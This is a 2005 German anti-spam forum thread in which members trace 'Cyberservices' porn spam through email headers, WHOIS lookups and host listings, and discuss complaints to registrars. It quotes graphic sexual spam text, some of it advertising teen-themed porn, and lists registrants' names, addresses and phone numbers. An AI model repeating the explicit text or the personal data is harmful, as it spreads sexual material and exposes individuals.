PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : 'Cyberservices'-Spam



Seiten : [1] 2

kjz1
18.07.2005, 23:08
Und auch heute war der 'Cyberservices'-Spammer wieder aktiv. Mittlerweile wird aber auch europe-online-billing. com als Bezahlsystem genutzt. Anscheinend ist Spammy auch hier variabel und benutzt jeden Abzo...ääähhh...Bezahldienst, der in diesem Milieu zu finden ist....

- kjz

----------<snip>----------------

From tkwfgrfjnwj @yahoo.com Mon Jul 18 xx:xx:xx 2005
Return-Path: <tkwfgrfjnwj @yahoo.com>
X-Flags: 1001
Delivered-To: GMX delivery to xxx @gmx.net
Received: (qmail invoked by alias); 18 Jul 2005 xx:xx:xx -0000
Received: from fmmailgate02.web.de (EHLO fmmailgate02.web.de)
[217.72.192.227]
by mx0.gmx.net (mx014) with SMTP; 18 Jul 2005 xx:xx:xx +0200
Received: by fmmailgate02.web.de (8.12.10/8.12.10/webde Linux 0.7) with
ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 18 Jul 2005 xx:xx:xx +0200
Received: from [220.71.85.220] (helo=217.72.192.188) ---Kornet, KR
by mx33.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
Received: from 60.171.180.188 by 220.71.85.220; Mon, 18 Jul 2005
xx:xx:xx -0200
Message-ID: [ID filtered]
From: "Jimmy Lassiter" <tkwfgrfjnwj @yahoo.com>
Reply-To: "Jimmy Lassiter" <tkwfgrfjnwj @yahoo.com>
To: xxx @web.de, xxx @web.de, xxx @web.de, xxx @web.de,
xxx @web.de, xxx @web.de, xxx @web.de
Subject: RE: Wochenende
Date: Mon, 18 Jul 2005 xx:xx:xx -0400
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--62614838115515343326"
X-Priority: 3
X-MSMail-Priority: Normal
X-WEBDE-FORWARD: xxx @web.de -> xxx @gmx.net
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 5 (Score=9.379; FORGED_YAHOO_RCVD MIME_BOUND_DD_DIGITS
MSGID_SPAM_CAPS RCVD_NUMERIC_HELO MISSING_MIMEOLE)
X-GMX-UID: [UID filtered]

----62614838115515343326
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable


Hallo,
ich habe es doch noch gefunden. Dachte schon die Adresse w=E4re weg.

Ist echt der Hammer was du hier sehen kannst.

Hier kannst du dir alle Filme sofort runterladen. Habe noch nie soviel
Auswahl gesehen. Das reicht f=FCr die n=E4chsten Monate.

Und all Neuerscheinungen sind da auch sofort online. Die Geschwindigkeit i=
st auch TOP


http: www.heisser-sommer. com/fun

Viel Spa=DF und meld dich mal die Tage

----62614838115515343326--



Domain name: heisser-sommer. com ---> 210.22.50.95 ---> TECH GROUP CNC

Registrant Contact:
N/A
Pedro Gonzalez (pedro98 [at] online.ie)
+506.8723819
Fax: +1.5555555555
Bario Escalan
San Jose, SA 1000
CR

Administrative Contact:
N/A
Pedro Gonzalez (pedro98 [at] online.ie)
+506.8723819
Fax: +1.5555555555
Bario Escalan
San Jose, SA 1000
CR

Technical Contact:
N/A
Pedro Gonzalez (pedro98 [at] online.ie)
+506.8723819
Fax: +1.5555555555
Bario Escalan
San Jose, SA 1000
CR


Name Servers:
ns1.abathost.info ---> 210.22.50.94 ---> Tech Group CNC
ns1.nltzone.biz ---> 217.70.177.43 --> Gandi
ns2.abathost.info ---> 210.22.50.95 ---> Tech Group CNC
ns2.nltzone.biz ---> 217.70.177.43 --> Gandi
ns3.nltzone.biz ---> 217.70.177.43 --> Gandi

Creation date: 07 Jul 2005 xx:xx:xx
Expiration date: 07 Jul 2006 xx:xx:xx


Domain ID:D10540377-LRMS
Domain Name:ABATHOST.INFO
Created On:08-Jul-2005 xx:xx:xx UTC
Last Updated On:18-Jul-2005 xx:xx:xx UTC
Expiration Date:08-Jul-2006 xx:xx:xx UTC
Sponsoring Registrar:R126-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C10662657-LRMS
Registrant Name:WhoisGuard Protected
Registrant Organization:WhoisGuard
Registrant Street1:8939 S. Sepulveda Blvd
Registrant Street2:8939 S. Sepulveda Blvd
Registrant City:Westchester
Registrant State/Province:CA
Registrant Postal Code:90045
Registrant Country:US
Registrant Email:ced93731f96f4e74bc01b33dab7d632f.protect [at] whoisguard.com
Admin ID:C10662657-LRMS
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard
Admin Street1:8939 S. Sepulveda Blvd
Admin Street2:8939 S. Sepulveda Blvd
Admin City:Westchester
Admin State/Province:CA
Admin Postal Code:90045
Admin Country:US
Admin Email:ced93731f96f4e74bc01b33dab7d632f.protect [at] whoisguard.com
Billing ID:C10662657-LRMS
Billing Name:WhoisGuard Protected
Billing Organization:WhoisGuard
Billing Street1:8939 S. Sepulveda Blvd
Billing Street2:8939 S. Sepulveda Blvd
Billing City:Westchester
Billing State/Province:CA
Billing Postal Code:90045
Billing Country:US
Billing Email:ced93731f96f4e74bc01b33dab7d632f.protect [at] whoisguard.com

Name Server:NS1.ABATHOST.INFO
Name Server:NS2.ABATHOST.INFO
Name Server:NS3.ABATHOST.INFO
Name Server:NS4.ABATHOST.INFO

Registrar: R126-LRMS
Whois Server: whois.afilias.info



Domain Name: NLTZONE.BIZ
Domain ID: [ID filtered]
Sponsoring Registrar: GANDI SARL
Sponsoring Registrar IANA ID: [ID filtered]
Domain Status: clientHold
Domain Status: clientTransferProhibited
Domain Status: inactive
Registrant ID: [ID filtered]
Registrant Name: Oleg Aprelenko
Registrant Organization: Private person
Registrant Address1: 706 Willowbrook rd.
Registrant City: Staten Island
Registrant State/Province: NY
Registrant Postal Code: 10314
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.8006698488
Registrant Email: altarrozzo [at] yahoo.com
Administrative Contact ID: [ID filtered]
Administrative Contact Name: Oleg Aprelenko
Administrative Contact Organization: Private person
Administrative Contact Address1: 706 Willowbrook rd.
Administrative Contact City: Staten Island
Administrative Contact Postal Code: 10314
Administrative Contact Country: United States
Administrative Contact Country Code: US
Administrative Contact Phone Number: +1.8006698488
Administrative Contact Email: altarrozzo [at] yahoo.com
Billing Contact ID: [ID filtered]
Billing Contact Name: CONTACT NOT AUTHORITATIVE see
http://www.gandi.net/whois
Billing Contact Organization: Gandi SARL
Billing Contact Address1: 38 rue Notre-Dame de Nazareth
Billing Contact City: Paris
Billing Contact Postal Code: 75003
Billing Contact Country: France
Billing Contact Country Code: FR
Billing Contact Email: support [at] gandi.net
Technical Contact ID: [ID filtered]
Technical Contact Name: Oleg Aprelenko
Technical Contact Organization: Private person
Technical Contact Address1: 706 Willowbrook rd.
Technical Contact City: Staten Island
Technical Contact Postal Code: 10314
Technical Contact Country: United States
Technical Contact Country Code: US
Technical Contact Phone Number: +1.8006698488
Technical Contact Email: altarrozzo [at] yahoo.com
Created by Registrar: GANDI SARL
Last Updated by Registrar: GANDI SARL
Domain Registration Date: Thu May 12 xx:xx:xx GMT 2005
Domain Expiration Date: Thu May 11 xx:xx:xx GMT 2006
Domain Last Updated Date: Thu Jul 07 xx:xx:xx GMT 2005





http://www.heisser-sommer.com/fun

redirects to:

http://www.europe-online-billing.com ---> 212.112.210.7 ---> IP4 GmbH,
Flensburg


212.112.210.7 - IP hosts 42 Total Domains ...
Showing 1 - 42 out of 42

Domain Name
1 1000FREEADULTPICS.COM.
2 1000FREEGAYPICS.COM.
3 49CENTSEX.COM.
4 CALLBOY24.COM.
5 DUMM-GEFICKTE-TEENS.COM.
6 EXIT-CASH.INFO.
7 FREEGAYPLEASURE.COM.
8 FREESEXPLEASURE.COM.
9 GEILEFEIERTAGE.COM.
10 GIRLTRONIC.COM.
11 GRATIS-GAYSEXCHAT.COM.
12 GRATISGAYSEXCHAT.COM.
13 GRATISGAYSHOW.COM.
14 GRATISLIVESEXSHOW.COM.
15 GRATISLIVESHOW.COM.
16 GRATISSEXPHOTOS.COM.
17 GRATISSEXSHOW.COM.
18 GROSSER-PENIS.COM.
19 GROSSERPENIS.COM.
20 HARTEBOYS.COM.
21 IBIZASCHLAMPE.COM.
22 LIVESEX-PER-WEBCAM.COM.
23 LOGOSPASS.COM.
24 NACKTES-HOLLYWOOD.COM.
25 NACKTESHOLLYWOOD.COM.
26 ONLINE-SONDERANGEBOT.COM.
27 P-VERGROESSERUNG.COM.
28 PORNTRONIC.COM.
29 SEX-PER-ANHALTER.COM.
30 SEXMOVIEWORLD.NET.
31 ST-PAULIGIRLS.COM.
32 STPAULIGIRLS.COM.
33 SUPERGAYSHOW.COM.
34 SUPERSEXYCHAT.COM.
35 SUPERSTARQUIZ.COM.
36 TEEN-SEX-MOVIES.NET.
37 TOPBONDAGE.COM.
38 TOPGAYFRANCE.COM.
39 UNZENSIERTER-ANALSEX.COM.
40 WAVEGATESYSTEM.COM.
41 WIR-ZEIGEN-ALLES.COM.
42 XXXPAARE.COM.



Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US

Domain Name: EUROPE-ONLINE-BILLING.COM

Administrative Contact -
Unlisted-Whois.com, LLC Ref# 394282 - gf02gzu645bf3m1 [at] brprivatewhois.com
Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US
Phone - 4107353410
Fax - 4107353433
Technical Contact -
Unlisted-Whois.com, LLC Ref# 394282 - sp1kwbv5k2cyx9r [at] brprivatewhois.com
Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US
Phone - 4107353410
Fax - 4107353433
Billing Contact -
Unlisted-Whois.com, LLC Ref# 394282 - c7yugjx1vzyzhy [at] brprivatewhois.com
Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US
Phone - 004107353410
Fax - 4107353433

Record updated date - 2005-07-11 xx:xx:xx
Record created date - 2005-07-11
Record expiring on - 2006-07-11
Database last updated on - 2005-07-18 xx:xx:xx EST

Domain servers in listed order:

DNS1.DEDICATEDNS.COM 65.109.255.100
DNS2.DEDICATEDNS.COM 206.16.197.8




Ref: SBL29048

210.22.50.0/25 is listed on the Spamhaus Block List (SBL)

17-Jul-2005 14:50 GMT | SR14

Multiple Spammer hosting - dirty block

Goofy
19.07.2005, 17:18
Da dürfte es aber einige Erreichbarkeitsprobleme geben.
http://www.dnsstuff.com/ sagt dazu:

Answer:
No A records exist for europe-online-billing.com. [Neg TTL=7200 seconds]

Mein Browser findet es allerdings noch.
Die o.a. Domainliste ist imposant und zeigt, was von diesem Laden demnächst an Spam noch auf uns zukommen wird.

Goofy

Koecks
19.07.2005, 17:20
Spam von Cyberservices bekomme ich auch reichlich.

Received: from [58.65.145.222] (helo=mbl-65-145-222.dsl.net.pk)
by mx24.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
for poor [at] spamvictim.tld; Sun, 17 Jul 2005 xx:xx:xx +0200
Received: from 120.196.54.59 by 58.65.145.222; Sun, 17 Jul 2005 xx:xx:xx -0200
Message-ID: [ID filtered]
From: "Sven" <etxdvpdmm [at] tiscali.de>
Reply-To: "Sven" <etxdvpdmm [at] tiscali.de>
To: poor [at] spamvictim.tld, poor [at] spamvictim.tld, poor [at] spamvictim.tld, poor [at] spamvictim.tld, poor [at] spamvictim.tld
Subject: Gratis
Date: Sun, 17 Jul 2005 xx:xx:xx -0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
X-Priority: 3
X-IP: 212.255.204.121
Sender: etxdvpdmm [at] tiscali.de


Received: from [219.154.47.135] (helo=217.72.192.149)
by mx33.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
for poor [at] spamvictim.tld; Sat, 16 Jul 2005 xx:xx:xx +0200
Received: from 32.122.120.129 by 219.154.47.135; Sat, 16 Jul 2005 xx:xx:xx +0300
Message-ID: [ID filtered]
From: "Werner" <twaul [at] yahoo.de>
Reply-To: "Werner" <twaul [at] yahoo.de>
To: poor [at] spamvictim.tld
Cc: xxx [at] web.de, xxx [at] web.de, xxx [at] web.de, xxx [at] web.de, xxx [at] web.de, xxx [at] web.de
Subject: Ihr Account
Date: Sat, 16 Jul 2005 xx:xx:xx +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
X-Webmail-Time: Sat, 16 Jul 2005 xx:xx:xx -0400
Sender: twaul [at] yahoo.de


Und mit welchen Bezahldienst Cyberservices B.V. zur Zeit abrechnet ist eigentlich auch egal. Fest steht nur das die Jungs von Cyberservices ausnahmslos jeden Kunden b****
edit. Sorry ohne Beweise bitte nicht solche Unterstellungen. Dots

Gruss
Koecks

kjz1
19.07.2005, 21:05
Da dürfte es aber einige Erreichbarkeitsprobleme geben.
http://www.dnsstuff.com/ sagt dazu:


Mein Browser findet es allerdings noch.
Die o.a. Domainliste ist imposant und zeigt, was von diesem Laden demnächst an Spam noch auf uns zukommen wird.

Goofy

Ich sage dazu: WDPRS....

Aber wie man sieht, registrieren die Spammer ihre Domains ja gerne im Hunderterpack. Ist ja eigentlich auch viel zu billig... Die Jungs müssen ja schon auf zufällige Buchstabenkombinationen ausweichen, da wohl mittlerweile jede möglich Kombination mit geil... und fick.... von Spammern belegt sein dürfte...

- kjz

sis
19.07.2005, 22:13
Spam von Cyberservices bekomme ich auch reichlich.Seit einigen Tagen kommt der Kram fast täglich. Da ich aber nicht daran denke, Energie in das Quoten von immer demselben Mist zu investieren, lese ich halt hier im Forum nur noch mit.
Wie Goofy schon schreibt, glaube ich nicht, dass der Cyberservice-Spam bei der Anzahl an neuen Domains abnimmt. Dafür werde ich aber beizeiten schonmal im Voraus für sämtliche 42 Domains Beschwerden an http://wdprs.internic.net absenden.

doc33
20.07.2005, 16:34
Als ich europe-online-billing.com neulich mal ein wenig genauer unter die Lupe genommen habe wurde daraus relativ deutlichd as es sich dabei um eine Schein Bezahlfirma handelte, möglicherweise vom Spammer selbst gegründet um auf niemand andern mehr angewiesen zu sein.

Investi
20.07.2005, 20:18
Als ich europe-online-billing.com neulich mal ein wenig genauer unter die Lupe genommen habe wurde daraus relativ deutlichd as es sich dabei um eine Schein Bezahlfirma handelte, möglicherweise vom Spammer selbst gegründet um auf niemand andern mehr angewiesen zu sein.

Dann solltest Du froh sein, daß Du nicht weiter gegraben hast. Da tun sich Abgründe auf. Im Handelsregister von New York (gesamter Bundesstaat) ist weder eine Fa. Unlisted-Whois.com, LLC noch eine Europe Online Billing eingetragen. Wenn man den Anmeldevorgang startet, dann kommt folgende Meldung:


Jetzt Freischalten
Angebot: TeenFickSchlampen.com
Ihre Zugangsdaten für den geschützten Mitgliederbereich senden wir Ihnen per E-Mail.

Aus "Europe-online-billing.com" wird "Europe-internet-billing.com", registriert über jemanden aus Cuba.

Unlisted-Whois.com existiert seit Februar 2005 - der Name ist Programm.

Und jetzt wird es interessant: Hinter der ganzen Geschichte steckt eine Firma aus Düsseldorf, die uns hier im Forum bereits häufiger beschäftigt hat.
Der Nachweis liegt mir schriftlich vor. Eventuell könnte man mal die Finanzbehörden auf diese illegalen Aktivitäten aufmerksam machen.

Investi
21.07.2005, 09:24
Eigentlich ist der Titel des Threads jetzt nicht mehr korrekt. Könnte man umbenennen in "M e a V i s t a - S p a m m e r".

Es gab zwar bereits mehrfach die Vermutung, daß zwischen den ganzen Spammern ein Zusammenhang besteht, aber einen 100-prozentigen Nachweis gabs wohl noch nie. Daher sollten wir Trennung auch noch beibehalten.

kjz1
21.07.2005, 10:12
Heute wieder eingetrudelt, diesmal aber mit www.heisser-sommer. com/riesen.
Scheint aber irgendwie nicht so richtig zu funktionieren. Auf jeden Fall ist das aber kein 'Feierabend-Ganove', sondern ein Hardcore-Spammer, der anscheinend sonst nichts gelernt hat.

- kjz

Investi
21.07.2005, 11:26
Funktioniert bei mir auch nicht. Hab grad mal eine Nachricht an Enom.com geschickt, denn die Registrierungsdaten scheinen auch - sagen wir mal ein wenig geschönt zu sein. Die Hauptseite von heisser-sommer landet auf einer Fehlermeldung von McPay.com, die auch über eine .com.kr-Adresse verfügen.

Investi
21.07.2005, 12:03
Heute wieder eingetrudelt, diesmal aber mit www.heisser-sommer. com/riesen.
Scheint aber irgendwie nicht so richtig zu funktionieren. Auf jeden Fall ist das aber kein 'Feierabend-Ganove', sondern ein Hardcore-Spammer, der anscheinend sonst nichts gelernt hat.

- kjz


Die Seite ist inzwischen erreichbar. Bei der Registrierung erscheint folgende Meldung:


Jetzt Freischalten
Angebot: RiesenSchwaenzeFickenGirls

Ihre Zugangsdaten für den geschützten Mitgliederbereich senden wir Ihnen per E-Mail.


Wer eine solche Spammail erhalten hat, sollte sich mal hier (http://www.enom.com/help/abusepolicy.asp) beschweren.

homer
21.07.2005, 12:28
Wer eine solche Spammail erhalten hat, sollte sich mal hier (http://www.enom.com/help/abusepolicy.asp) beschweren.


Current Registrar: ENOM, INC.
IP Address: 221.10.254.75 (ARIN & RIPE IP search)
IP Location: CN(CHINA)

Und Du meinst, das hilft was?

Investi
21.07.2005, 13:01
Und Du meinst, das hilft was?

Nun, dann hilft evtl. der Zusatz, daß man gleichlautende Mail an den Secretary of State beim Washington Department of State sowie an das Department of Revenue (zuständig für die "Behandlung" nicht registrierter steuerpflichtiger Gewerbe) sendet und diese über die Ergebnisse der Recherche zu Enom, Inc. (https://fortress.wa.gov/dor/brd/Results.aspx?RequestType=1&Criteria=enom&City=) informiert.

kjz1
21.07.2005, 19:15
Wer eine solche Spammail erhalten hat, sollte sich mal hier (http://www.enom.com/help/abusepolicy.asp) beschweren.

Manchmal hilft auch eine Mail an die Rechtsabteilung von Enom: Legal (at) enom (dot) com

- kjz

Investi
21.07.2005, 19:47
Manchmal hilft auch eine Mail an die Rechtsabteilung von Enom: Legal (at) enom (dot) com

- kjz


Dann sollte der Hinweis darauf aber nicht fehlen, daß es eine Enom, Inc. unter der auf der HP angegebenen Anschrift nicht (mehr) gibt. Könnte fatale Folgen haben, wenn die FTC und andere Ämter erfahren, daß Spammer-unterstützende Provider, Registrare und Hoster die Steuerbehörden umgehen.

Sirius
22.07.2005, 09:52
Hallo.

Lange Zeit war Ruhe, doch gestern hat es die Typen von Cyberservices wohl mal wieder gejuckt:
Subject: ******? Heute Abend noch?
Content-Transfer-Encoding: 8bit
To: ###@###.###
From: "Judith" <judith [at] boobie.cc>
X-Eon-DM: dm25
X-Msmail-Priority: Normal
X-Priority: 3
Received: from boobie.cc (213.159.10.213 [213.159.10.213])by dm25.mta.everyone.net (EON-INBOUND) with ESMTP ID: [ID filtered]
Return-Path: <judith [at] boobie.cc>
Content-Type: text/plain;charset="iso-8859-1"
Mime-Version: 1.0
X-Mimeole: Produced By Microsoft MimeOLE V6.00.2800.1506
Date: Wed, 20 Jul 2005 xx:xx:xx +0200
X-Mailer: Microsoft Outlook Express 6.00.2800.1506

Zickt deine Freundin rum und will es nicht mit dir machen? Hat die Ehefrau Kopfschmerzen? Oder bist du solo und du willst es auch bleiben aber trotzdem geil mal einen wegstecken? Dann ist unsere Seite genau das richtige für deine Wünsche. Hier triffst du geile Girls die nur ****** wollen, nicht mehr.

Ohne Stress und ohne Verpflichtungen kannst du dir hier ein scharfes Luder klar machen und vielleicht geht dieses heiße Date noch heute Abend ab, wer weiß. Unsere Datenbanken sind randvoll mit scharfen Bräuten und die ein oder die andere scharfe Frau ist bestimmt auch in deiner Nähe abzugreifen.

http://www.boobie.cc/?ml=1&MID=10041859&WMID=62584&Spon=platb

Wenn Du diesen Newsletter nicht mehr erhalten möchtest, kannst du dich hier austragen:

http://www.boobie.cc/a.php?adr=1 [at] pornoanwalt.de

UM4303123
---

213.159.10.213 ist tatsächlich die IP von boobie.cc und auf "PLANT hosting & colocation" in Holland registriert.

BTW: Woher wissen die nur, wann meine Frau Kopfschmerzen hat?

Grüße

kjz1
22.07.2005, 10:34
Heute war es: www.heisser-sommer. com/jetzt Langsam wird es lästig. Erst einmal pro Woche, aber jetzt scheint Spammy (aufgrund anhaltenden Misserfolges?) schon alle 2 Tage seinen Dreck in die Umwelt zu blasen.

Bei den Registraren liegt das Problem wohl darin, dass die ewig geldhungrige ICANN anscheinend an fast jede 'Hinterhofklitsche' eine Lizenz als Registrar vergeben hat, um so an Lizenzeinnahmen zu kommen. Und da sie von deren Lizenzzahlungen relativ abhängig zu sein scheint (Wes Brot ich ess', des Lied ich sing...), scheint die ICANN auch ihre eigenen Policies (Richtigkeit der WHOIS-Angaben, etc.) nur sehr widerwillig gegen Registrare durchsetzen zu wollen. Und Beteiligung unabhängiger (User-) Vertreter ist in ICANN-Gremien anscheinend auch nicht unbedingt gern gesehen. Da mauschelt man lieber 'unter sich' weiter....

Und letztendlich: durch ihre Registrierungen im Hunderterpack sind Spammer bei Registraren sicher gern gesehene Kunden. Ob es da auch 'pink contracts' gibt? Auf jeden Fall ist hier keine Geschäftsethik mehr im Spiel, da geht es nur noch darum, möglichst schnell möglichst viel Kohle zu scheffeln. Ansonsten: nach uns die Sintflut...

- kjz

Goofy
22.07.2005, 15:02
Man kann wohl mit Fug und Recht sagen, dass die Schaffung der .biz- und .info-tld´s nicht zuletzt den Hintergrund hatte, eine neue Goldader für das boomende Geschäft mit den Spammerdomains zu öffnen.
Diese ganzen "policies" etc. sind scheinheilig, falsch und die verbrauchten bytes nicht wert, in denen sie vorgehalten werden.

Goofy

Goofy
24.07.2005, 12:39
dns-stuff.com sagt:
Answer:
No A records exist for heisser-sommer.com. [Neg TTL=172800 seconds]


Ob da irgendwas heißgelaufen ist? :)

Goofy

kjz1
24.07.2005, 17:46
Und nicht nur da.....

No A records exist for abathost.info. [Neg TTL=600 seconds]
No A records exist for nltzone.biz. [Neg TTL=900 seconds]

Den Nameservern scheint's auch nicht bekommen zu sein...

- kjz

Goofy
24.07.2005, 17:58
Aktuelles Wetter in China: (http://i.cnn.net/cnn/.element/img/1.0/weather/cnn/asia_highs.jpg)

Da ist der Sommer einfach zu heiß geworden...
:D

homer
26.07.2005, 21:08
Und nun der tägliche Cyberservices -Sch****.
Wieder die häßlichen Mütter und Töchter auf http://www.anythingforyou.cc. Sowas grenzt schon an Körperverletzung, oder um mit Al Bundy zu sprechen: "Ich bin bliiind!"
Return-Path: <zifevyqoxryi [at] gmx.com>
Received: from 72.9.24.162 by mandy.highendserver.de (envelope-from <zifevyqoxryi [at] gmx.com>, UID: [UID filtered]
(clamdscan: 0.75.1. spamassassin: 2.63.
Clear:RC:0(72.9.24.162):SA:1(9.3/5.0):.
Processed in 4.417256 secs); 26 Jul 2005 xx:xx:xx -0000
Received: from unknown (HELO gmp-inet24-162.gmpexpress.net) (72.9.24.162)
by 0 with SMTP; 26 Jul 2005 xx:xx:xx -0000
Received: from 150.118.122.200 by 72.9.24.162; Tue, 26 Jul 2005 xx:xx:xx +0100
Message-ID: [ID filtered]
From: "Lothar" <zifevyqoxryi [at] gmx.com>
Reply-To: "Lothar" <zifevyqoxryi [at] gmx.com>
To: poor [at] spamvictim.tld
Subject: Neugierig?
Date: Tue, 26 Jul 2005 xx:xx:xx -0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
X-Webmail-Time: Tue, 26 Jul 2005 xx:xx:xx +0500

webeinspunktnull
26.07.2005, 22:47
Received: from [81.31.44.34] (helo=telehits.cc)
by mx22.web.de with esmtp (WEB.DE 4.105 #297)
ID: [ID filtered]
for ; Tue, 26 Jul 2005 xx:xx:xx +0200
Received: from 10.0.6.3
by telehits.cc with asmtp (Exim)
ID: [ID filtered]
for ; Tue, 26 Jul 2005 xx:xx:xx +0200
Message-ID: [ID filtered]
Subject: Extreme Lust, extremer Sex... extremesexchannels.com
Date: Tue, 26 Jul 2005 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To:
From: "Yvonne" <yvonne [at] extremepics.org>
Sender: yvonne [at] extremepics.org



Hier hast Du einen Kanal für jede noch so versaute Sexspielerei. Egal ob
fest verschnürt und durchgenagelt oder tief versenkt in den noch
jungfräulichen Arsch. Hier kriegst Du die härtesten, perversesten und
versautesten... eben einfach die extremsten Sexspiele überhaupt geboten und
das in allerbester Bild- und Tonqualität.

Geil Dich auf an spermasüchtigen Amateurschlampen auf oder erlebe
rattenscharfe Teengirls, denen der Mund richtig voll gepisst wird. Sei
dabei, wenn harte Männerfäuste Muschis aufreißen und wenn heißes Wachs auf
dicke Brüste tropft. Geiler und härter können andere Seiten nicht sein, denn
die ExtremeSexChannels sind das umfangreichste und härteste Sexprogramm, in
DVD-Qualität, im Netz und weltweit.

http://www.extremepics.org/?ml=1&MID=10041489&WMID=66765&Spon=guertraff

Na? Nicht überzeugt von den scharfen Angeboten? Schade, aber wenn Du
wirklich nichts mehr von uns wissen willst, klickst du hier:

http://www.extremepics.org/a.php?adr[

UM4931077

webeinspunktnull
26.07.2005, 22:49
wohl die selben Spammer?

Received: from [62.129.136.209] (helo=webscan.cc)
by mx32.web.de with esmtp (WEB.DE 4.105 #297)
ID: [ID filtered]
for ; Tue, 26 Jul 2005 xx:xx:xx +0200
Received: from 10.0.14.3
by webscan.cc with asmtp (Exim)
ID: [ID filtered]
for ; Tue, 19 Jul 2005 xx:xx:xx +0200
Message-ID: [ID filtered]
Subject: Porno auf Abruf - 24h Hardcore pur
Date: Tue, 19 Jul 2005 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To:
From: "VOD-Trend" <redaktion [at] webscan.cc>
Sender: redaktion [at] webscan.cc



Schwänze und Titten rund um die Uhr. Heiße Fickorgien mit den versautesten
Stellungen und hemmungslose Lust zu jedem Thema. Egal was Du geil findest -
bestellen kannst du es dir nur hier. Du wählst welchen geilen Streifen Du
sehen willst und wenig später kriegst Du ihn direkt auf Deinen PC. Video on
demand heißt dieser Service. Kein Abo, keine Extrakosten, weltweit die
geilsten und neuesten Pornos.

Melde Dich noch heute, am besten jetzt gleich an und erhalte 10 Minuten
Porno for free. Minutengenaue Abrechnung. Nur was Du wirklich guckst, zahlst
Du auch. Erlebe die echten Pornostars und kesse Pornosternchen in ihren
heißesten Rollen und gönne dir aufregende Stunden mit dem besten
Erotik-Entertainment-Programm.

http://www.webscan.cc/?ml=1&MID=10041453&WMID=66127&Spon=websc

Wenn Du diesen Newsletter nicht mehr erhalten möchtest, kannst du dich hier
austragen:

http://www.webscan.cc/a.php?adr=

UM4931077

bääh pfui Spinne deren Vokabular erst



Received: from [81.31.44.2] (helo=funmod.tv)
by mx28.web.de with esmtp (WEB.DE 4.105 #297)
ID: [ID filtered]
for .de; Tue, 26 Jul 2005 xx:xx:xx +0200
Received: from 10.0.3.3
by funmod.tv with asmtp (Exim)
ID: [ID filtered]
for web.de; Mon, 25 Jul 2005 xx:xx:xx +0200
Message-ID: [ID filtered]
Subject: Hart, ausdauernd und dauergeil - Fickmaschinen
Date: Mon, 25 Jul 2005 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To:
From: "Daniela" <daniela [at] funmod.tv>
Sender: daniela [at] funmod.tv



Wenn man manche Girls so jammern hört, daß sie es nie genug besorgt
bekommen, wünscht man denen echt mal gewaltigen Muschibrand. Diese Girls
brauchen mehr als den Besten, den Längsten oder den Härtesten. Diese Girls
brauchen Fickmaschinen. Stets bereit, gut geölt und geschaffen um Lust zu
bringen und zu befriedigen.

Diese Fick-o-maten rammen die schärfsten Dildos ohne Pause, diesen notgeilen
Schlampen in die Möse und ****** sie, bis diese Schlampen außer Lust nichts
anderes mehr spüren. Bis zum finalen Abspritzen verrichten diese Fickmaschen
knallhart ihren Dienst und nageln die Girls nach Strich und Faden. Erst ganz
langsam und ganz tief und dann immer härter und schneller.

http://www.funmod.tv/?ml=1&MID=10041482&WMID=61935&Spon=CJBV

Wenn Du diesen Newsletter nicht mehr erhalten möchtest, kannst du dich hier
austragen:

http://www.funmod.tv/a.php?adr=

UM4931077

webeinspunktnull
26.07.2005, 22:53
:m!m: ??? wassen da passiert? Im EditMode sind die Tags richtig gesetzt.. HILFEE!!!

update oops einen spamlinktag nicht geschlossen

kjz1
10.08.2005, 11:37
Nach etwas längerer (Zwangs?-)Ruhepause ist auch der Cyberservices Spammer wieder da. Anscheinend haben einige nichts anderes gelernt und können's nicht lassen.

- kjz

------------------------------
From kwbcyh @yahoo.com Wed Aug 10 xx:xx:xx 2005
Return-Path: <kwbcyh @yahoo.com>
X-Flags: 1001
Delivered-To: GMX delivery to xxx @gmx.net
Received: (qmail invoked by alias); 10 Aug 2005 xx:xx:xx -0000
Received: from mx23.web.de (EHLO mx23.web.de) [217.72.192.133]
by mx0.gmx.net (mx039) with SMTP; 10 Aug 2005 xx:xx:xx +0200
Received: from [65.190.199.119] (helo=cpe-065-190-199-119.nc.res.rr.com)
by mx23.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
Received: from 220.60.40.224 by 65.190.199.119; Wed, 10 Aug 2005
xx:xx:xx +0500
Message-ID: [ID filtered]
From: "Marvin Laird" <kwbcyh @yahoo.com>
Reply-To: "Marvin Laird" <kwbcyh @yahoo.com>
To: xxx @web.de, xxx @web.de, xxx @web.de,
